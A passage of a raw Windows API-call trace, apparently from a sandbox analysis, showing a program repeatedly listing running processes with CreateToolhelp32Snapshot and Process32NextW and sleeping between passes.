Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0109.604] CloseHandle (hObject=0xbc) returned 1 [0109.604] Sleep (dwMilliseconds=0x12c) [0109.911] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.916] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.962] CloseHandle (hObject=0xc4) returned 1 [0109.962] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.967] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, 